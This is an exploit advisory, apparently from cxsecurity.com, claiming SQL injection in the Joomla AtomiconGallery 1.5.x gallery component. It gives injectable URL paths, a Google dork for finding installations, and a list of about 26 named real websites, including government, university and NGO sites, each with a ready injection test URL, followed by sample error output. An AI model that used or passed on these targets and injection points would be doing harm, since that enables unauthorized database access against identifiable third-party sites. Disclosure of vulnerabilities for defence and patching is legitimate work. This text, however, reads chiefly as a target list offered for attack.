Joomla AtomiconGallery Components 1.5.x SQL Injection

2019.02.01
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################################################################### # Exploit Title : Joomla AtomiconGallery Components 1.5.x SQL Injection # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 01/02/2019 # Vendor Homepage : atomicon.nl # Software Download Link : atomicon.nl/wp-content/uploads/atomicon-gallery.zip # Software Information Link : atomicon.nl/atomicongallery # Software Version : 1.5.x # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : inurl:''/index.php?option=com_atomicongallery'' # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description about Software : *************************** AtomiconGallery is a lightweight database-less gallery and it can be use for Joomla 1.5.x version. #################################################################### # Impact : *********** Joomla AtomiconGallery 1.5.x component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. A remote attacker can send a specially crafted request to the vulnerable application and execute arbitrary SQL commands in application`s database. Further exploitation of this vulnerability may result in unauthorized data manipulation. An attacker can exploit this issue using a browser. #################################################################### # SQL Injection Exploit : ********************** /index.php?option=com_atomicongallery&folder=[SQL Injection] /index.php?option=com_atomicongallery&view=atomicongallery&Itemid=[SQL Injection] /index.php?option=com_atomicongallery&folder=Sample%20Images&lang=en&Itemid=[SQL Injection] /index.php?option=com_atomicongallery&folder=Image%20Gallery&Itemid=[SQL Injection] /index.php?option=com_atomicongallery&folder=[FOLDER-NAME-HERE]&Itemid=[SQL Injection] #################################################################### # Example Vulnerable Sites : ************************* [+] coastal.gov.lk/index.php?option=com_atomicongallery&folder=Image%20Gallery&Itemid=117%27 [+] smkst-teresa.edu.my/index.php?option=com_atomicongallery&folder=1%27 [+] hnc.edu.ps/portal/index.php?option=com_atomicongallery&folder=1%27 [+] onumujeres-ecuador.org/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=1%27 [+] ergulmakina.com.tr/home/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=62%27 [+] janschoutendakwerken.nl/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=3%27 [+] tomcatbakery.com/index.php?option=com_atomicongallery&view=atomicongallery&id=71%27 [+] azioniacatena.it/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=5%27 [+] zakariamusic.com/index.php?option=com_atomicongallery&folder=Studio&Itemid=64%27 [+] hotel-bougafer.com/v2/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=194%27 [+] ammpe.org/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=4%27 [+] shotgunshacks.nl/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=6%27 [+] gospin.pl/index.php?option=com_atomicongallery&folder=1%27 [+] aurbanska.ehost.pl/jml/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=93 [+] photonhellas.gr/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=75%27 [+] culaocham.info/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=24%27 [+] letsinvestmaldives.com/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=10%27 [+] szetule.pl/index.php?option=com_atomicongallery&folder=1%27 [+] meistersv.nl/index.php?option=com_atomicongallery&folder=1%27 [+] obec-lavicky.cz/index.php?option=com_atomicongallery&folder=1%27 [+] fetishmodel.ru/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=5%27 [+] homanpainting.com/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=65%27 [+] tunisieformations.com/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=18%27 [+] martin-hoy.co.uk/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=6%27 [+] research.pbru.ac.th/web/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=93%27 [+] guayab.com/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=59%27 #################################################################### # Example SQL Database Error : **************************** Strict Standards: Non-static method JLoader::import() should not be called statically in /home3/onumujer/public_html /libraries/loader.php on line 186 Strict Standards: Non-static method JApplicationHelper::getPath() should not be called statically, assuming $this from incompatible context in /home3/onumujer/public_html/libraries/joomla /application/component/helper.php on line 168 Strict Standards: Non-static method JRequest::getCmd() should not be called statically, assuming $this from incompatible context in /home3/onumujer/public_html/libraries /joomla/application/helper.php on line 112 #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top